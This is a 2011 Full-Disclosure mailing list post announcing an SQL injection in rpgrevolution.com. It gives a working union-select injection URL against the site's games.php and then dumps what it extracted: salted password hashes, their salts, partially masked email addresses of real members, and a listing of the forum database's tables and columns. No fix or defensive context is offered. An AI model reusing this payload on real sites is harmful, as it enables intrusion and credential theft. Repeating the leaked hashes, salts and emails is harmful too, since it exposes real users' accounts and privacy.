Date: Thu, 13 Jan 2011 20:07:38 -0600
From: Bob Smith <bobbyhadababyitsaboy@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: rpgrevolution.com SQL Injection

/home/rpgrev/domains/rpgrevolution.com/public_html/

http://www.rpgrevolution.com/games.php?platform=all&genre=aaaaaaaaaaaaaaaaaaaaaaa'
union select 1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15
from ibf_members_converge-- -&list=desc&limiter=10&order=id

Salted

63217a559a7be4704156457c633c3344,4164d790f0047fc513b66ae1897bd6f2,16bd17aa7cb278c5520b021838a84a97,fe1d2c340c644126ba041bf0e97b7626,4263acb3502f6398ceb3841aa597fc5b,1da97968c870b5e8f4f8bd8897818056,5d9d9fa96b96c6c65b0673574a35453a,3f2e95b48762eb5b05f2424cfa80892a,6be4fb54d289d423ad69d9ef9b644156,731860ca22a89f0892a167f2afc81fa5,0b554ca29560318413f628347f46739b,07f2abe0dd2f40f0645e516f0f99325f,5f6ca10a7f1b0161acec092e4bee3c3c,1f2f49e8cf15428c350d96e2c2657d8b,c3d4f999324da31ee27cded6f9afde82,8787496111945c44e9d1bf62c43f9a40,5eaa772f28ca4c5832b997a6d24eb583,7e0e12c300b74661b6d6af08061d9363,0b2b5b1fb0dd8741328306b11166db63,57701c03e318d9fd39c56770b5f8a690,3dc61c20f521ead4381f02d9e99a0f46,e4a109ad7f09f3592b66c1ff3bce757b,562cd66fb31032973b116c4f5e9d01ac,a1815b2be6045fb98d850b96f0826ea3,d5234683d52606e67c9892c848a27eef,d2944383a1a72ae25b1dc49099ce0fa8,e161df49ddeda84829f2dd450a787632,d5be51ebf16f3768e52ca3ce7dc8372e,4a810955d9c4d9c956c14e8870c88338,615019960314d071fea6c37eaf363dca,
 67539a45a48399e929963918277ab37f

Corresponding Salt

lNF@,,av7@e,zm?m/,~>H;<,EKu(h,#Z/q;,q$[Qc,9D.e},C|@;Z,E;hhO,eIG,u,+4Vqb,)p%/},q:Z{T,W'.Tj,THvsH,_f|+g,b[3tA,4%BuP,4n^n6,P(/.e,VliRl,xfA%a,U9Rce,C-JY3,qgoB~,|9P3Q,W],*`,$]S+G,Pz_Fw,:y@/,,5.LMi,>r1d?,krR)@,70=1|,}}~rI,|Hr[f,Xz)Db,KvXc^,h9'F},~J)er,J/QNO,F*I*O,43fh2,B3lLg,r|zjv,:mZ>j,MpLdR,$ScWu,MC7S[,F.LS.,xVToc,#vj?(,(5-R+,E:?p7,<8Mi{,s/%Z8,wb*zC,2W0Ag,H]%~{,68wdx,z3"Q),^Ir#6,girRW,xhd#j,d8`_x,]:9_z,-n3^b,L3z`0,U,~Jy,]{}:^,4+4<`,HdJ?B,uDjFw,%1MZF,q4{-N,w%d/:,9UXJ{,+2up5,V@Xul,L]M/5,G/&Vg,tZB<U,O}Wiu,pWy45,G:tw=,Ii%*9,PAstq,^J-O-,`9VS0,5pU}f,00|vf,B9*Td,jHrs=,lxEp3,?d#3J,@Lv2,,&]]R8,piB07,n3{(U,&oNQC,I8-*@,7H+b9,5tAce,RMJNT,aj%Wq,zru'0,cN%^m,u7@f4,P%/==,-IH/U,$iI8%,xp?NY,NAzQ9,=h.Xi,_n7P=,8IMKh,ej<]x,ZuWFg,oEe@1,n<^"],K!~[&,B|!{=,Gq9vP,7.-jc,i=c]q,"]']$,7I;]K,)zydA,v$/o?,`'z^f,`ug!),Mh+SM,]T,k9,x^T-!,U&.>M,Y51Vn,;@TW1,_]^H:,v^'E.,1_:;+,{ovD.,lF"^|,y`:v^,Gd4h|,Ju`/C,1UV/l,1J'*G,0m86q,qq!Xf,]S8h(,GWsR(,g[1<R,h#gGW,@?ecm,%oR&l,PA7K`,C3$*},@<dA@,]G83D,&;oJ<,hU)q{,T=}W~,5Nad],gI@eS,
 MVA{D,%D`*M,JvDx[,.=&_E,Q>PLx,hlu4

minsu86@...il.com,cooldude2k@...il.com,sir.shaun@...il.com,psychoantwon@...il.com,jcink2k@...il.com,jonathan.pandgir@...il.com,renee2k@...il.com,stepan_par@....com,webmaster@...mrd.zzn.com,kumihosan@...il.com,josemmm@...ra.com.br,riou@...en24.com,ruze8890@...il.com,ivan_polanco18@...mail.com,gary@...dev.com,diana_sexylady@...mail.com,saboor_ryu@...mail.com,gf@...a.co.il,unconformist@...il.com,renate2k@...il.com,xsilverblade@....com,knigt2@...mail.fr,theomen9mm@...mail.com,eleven11@...l.com,klein.99@...il.com,nickctm@...il.com,game_boi_sp@...mail.com,when_is_now@...mail.com,tiggerville2929@...il.com,cyferki@...pl,guardian_drayal@...mail.com,hitman19@...nline.de,jayce@...inelegy.com,crprince@...us.net,jellyman@...rter.net,jellydude3443@...oo.com,ultrapokemaniac@...oo.com,nukehunter@...mail.com,hawkfire01@...mail.com,kekko90@...ceposta.it,bballtj93@...izon.net,zamual05@....com,memorym@...la.co.il,quickcutthroat@...oo.com,drew_samuelsen@...mail.com,cecilvanhelsing@...il.com,fresc
 o_dewidt@...mail.com,

access, -- userid,forumid,accessmask
article,
download,
download_cats,
game_cats,
game_comments,
game_downloads,
game_reviews,
game_votes,
games, -- id,title,developer,date,desc,platform,genre,status,url,feat,view,user,rating,downloads,approve
ibf_acp_help,
ibf_admin_login_logs,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_ahreports,
ibf_ahreports_addons,
ibf_ahreports_adminmsg,
ibf_ahreports_cats,
ibf_ahreports_comments,
ibf_ahreports_communicate,
ibf_ahreports_status,
ibf_announcements,
ibf_api_log,
ibf_api_users, --api_user_id,api_user_key,api_user_name,api_user_perms,api_user_ip
ibf_arcade_acthistory,
ibf_arcade_actihis,
ibf_arcade_activity,
ibf_arcade_cats,
ibf_arcade_challengeps,
ibf_arcade_challenges,ibf_arcade_news,ibf_arcade_scoreboard,ibf_arcade_sessions,ibf_arcade_sitngo,ibf_arcade_sitngo_plyers,ibf_arcade_tartemp,ibf_attachments,ibf_attachments_type,ibf_badwords,ibf_banfilters,ibf_bulk_mail,ibf_cache_store,ibf_cal_calendars,ibf_cal_events


ibf_validating
ibf_members_converge-converge_id,converge_email,converge_joined,converge_pass_hash,converge_pass_salt
ibf_members_partial
ibf_members-id,name,mgroup,email,joined,ip_address,posts,title,allow_admin_mails,time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,ignored_users,mgroup_others,org_perm_id,member_login_key,member_login_key_expire,subs_pkg_chosen,files,downloads,points,deposited,auto_collect,last_collect,extra_interest,creditcard,show_in_staff,has_blog,members_auto_dst,members_cache,members_disable_pm,members_display_name,members_created_remote,members_editor_choice,members_markers,arcade_gtype,arcade_sess_gid,arcade_sess_start,arcade_b_challenges,arcade_usepm,arcade_challenge_banned,arcade_challengeid,arcade_challenge,arcade_u_cha,arcade_session,arcade_time_spent,user_r_pp,jackpots_won,jackpots_points,arcade_won,arcade_spent,arca
 de_activity,arcade_activitywon,user_u_columns,


ibf_sessions-id,member_name,member_id,ip_address,browser,running_time,login_type,location,member_group,in_error,in_dldo,in_dlcat,in_dlfile,location_1_type,location_1_id,location_2_type,location_2_id,location_3_type,location_3_id,in_game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
